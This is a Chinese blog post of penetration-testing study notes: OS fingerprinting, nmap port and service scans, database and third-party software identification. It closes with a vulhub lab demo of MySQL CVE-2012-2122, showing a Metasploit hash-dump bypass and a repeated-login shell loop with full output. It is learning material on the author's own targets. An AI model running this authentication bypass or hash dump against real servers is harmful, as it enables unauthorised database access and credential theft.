【网络安全】系统及数据库等安全问题

crabin_lpb

已于 2022-03-23 21:22:05 修改

阅读量6.5k

点赞数

文章标签： docker 服务器 web安全

于 2022-03-22 21:11:10 首次发布

本文链接：https://blog.csdn.net/m0_52149675/article/details/123671520

版权

系统及数据库等安全问题

操作系统层面

识别操作系统常见方法

Windows 对大小写不敏感

https://www.bilibili.com/video/BV1JZ4y1c7ro?p=5

https://www.bilibili.com/video/BV1JZ4y1c7ro?P=5

都可以正常访问

linux：https://ctf.bugku.com/challenges/detail/id/81.html

https://ctf.bugku.com/challenges/detail/iD/81.html 不存在

在这里插入图片描述

通过TTL来判断目的主机的操作系统类型

不同的操作系统的默认TTL值是不同的，所以我们可以通过TTL值来判断主机的操作系统，但是当用户修改了TTL值的时候，就会误导我们的判断，所以这种判断方式也不一定准确。下面是默认操作系统的TTL：
1、WINDOWS NT/2000 TTL：128
3、UNIX TTL：255
4、LINUX TTL：64
5、WIN7 TTL：128

在命令窗口中使用ping命令：1.12.250.218是我的 CentOS 系统

即可大概确定是Linux系统

使用Nmap

C:\Users\15283>nmap -O 1.12.250.218
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 18:37 中国标准时间
Nmap scan report for 1.12.250.218
Host is up (0.026s latency).
Not shown: 991 filtered tcp ports (no-response), 3 filtered tcp ports (admin-prohibited)
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   open   ssh
80/tcp   open   http
888/tcp  open   accessbuilder
8888/tcp open   sun-answerbook
Aggressive OS guesses: Linux 5.1 (92%), Linux 3.10 - 4.11 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 3.18 (89%), Linux 3.16 - 4.6 (89%), Linux 4.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.22 seconds

可以看到是Linux

操作系统层面漏洞类型对应意义

windows安全漏洞：

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/securitybulletins2017

例如：MS17010(永恒之蓝)漏洞就是Windows远程代码执行漏洞，可以获得远程电脑上的一定权限

在这里插入图片描述

简要操作系统层面漏洞影响范围

会得到操作系统权限的漏洞就是高危漏洞

数据库层面

识别数据库类型常见方法

常见的搭组合：

ASP+Access
php + MySQL
aspx+ MS sql
jsp+MySQL, oracle
python+mongo dB

使用Nmap扫描查看端口开放情况

关系型数据库
  mysql				3306
  sqlserver		1433
  oracle			1521
  psotgresql	5432
非关系型数据库
  MongoDB			27017
  Redis				6379
  memcached		11211

在这里插入图片描述

3、数据库常见漏洞类型及攻击

存在弱口令
数据库漏洞

简要数据库层面漏洞影响范围

数据库权限
网站权限
修改网页内容

第三方层面

如何判断有那些第三方平台或软件

通过网站去扫描有些网站安装了第三方的软件如phpmyadmin通过扫描就可以发现他的安装目录
判断安装了第三方软件

端口扫描
nmap -O -sV 10.1.1.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:26 CST
Nmap scan report for 10.1.1.130 (10.1.1.130)
Host is up (0.00085s latency).
Not shown: 978 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

可以得到第三方的平台

简要为什么要识别第三方平台或软件

不同的第三方软件或工具存在不同的漏洞、识别到更多的信息对收集到的漏洞也就越多

常见第三方平台或软件漏洞类型及攻击

弱口令
软件的漏洞攻击

简要第三方平台或软件安全测试的范围

直接获取到软件的权限便于进一步的提权和攻击

补充

除去常规WEB安全及APP安全测试外，类似服务器单一或复杂的其他服务（邮件，游戏，负载均衡等），也可以作为安全测试目标，此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!

实例

在靶机搭建vulhub

crabin@crabin-virtual-machine:~/vulhub/mysql/CVE-2012-2122$ docker-compose up -d
Creating network "cve-2012-2122_default" with the default driver
Pulling mysql (vulhub/mysql:5.5.23)...
5.5.23: Pulling from vulhub/mysql
22dc81ace0ea: Pull complete
1a8b3c87dba3: Pull complete
91390a1c435a: Pull complete
07844b14977e: Pull complete
b78396653dae: Pull complete
fe8cde33ebc9: Pull complete
eb305569f43b: Pull complete
Digest: sha256:5bbb7570f16526da1de61e84487daade5614eb2a9bfd28a87bcf4d6795b94463
Status: Downloaded newer image for vulhub/mysql:5.5.23
Creating cve-2012-2122_mysql_1 ... done

演示某数据库弱口令及漏洞演示

参考文档：https://vulhub.org/#/environments/mysql/CVE-2012-2122/

┌──(root💀kali)-[~]
└─# nmap -O -sV 10.1.1.133
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 11:09 CST
Nmap scan report for 10.1.1.133 (10.1.1.133)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.23
MAC Address: 00:0C:29:13:E9:61 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds

漏洞利用

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 10.1.1.133
rhosts => 10.1.1.133
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set threads 10
threads => 10 #线程数
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] 10.1.1.133:3306       - 10.1.1.133:3306 The server allows logins, proceeding with bypass test
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 10% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 20% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 30% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 40% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 50% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 60% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 70% complete
[*] 10.1.1.133:3306       - 10.1.1.133:3306 Authentication bypass is 80% complete
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Successfully bypassed authentication after 847 attempts. URI: mysql://root:DBrmCST@10.1.1.133:3306
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306       - 10.1.1.133:3306 Hash Table has been saved: /root/.msf4/loot/20210608111341_default_10.1.1.133_mysql.hashes_091970.txt
[*] 10.1.1.133:3306       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

md5在线解密
https://www.cmd5.com/

在这里插入图片描述

└─# mysql -uroot -p123456 -h10.1.1.133
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 886
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| test               |
+--------------------+
4 rows in set (0.001 sec)

方法二

┌──(root💀kali)-[~]
└─# for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.1.1.133 -P 3306; done                                                                                                      130 ⨯
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1553
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>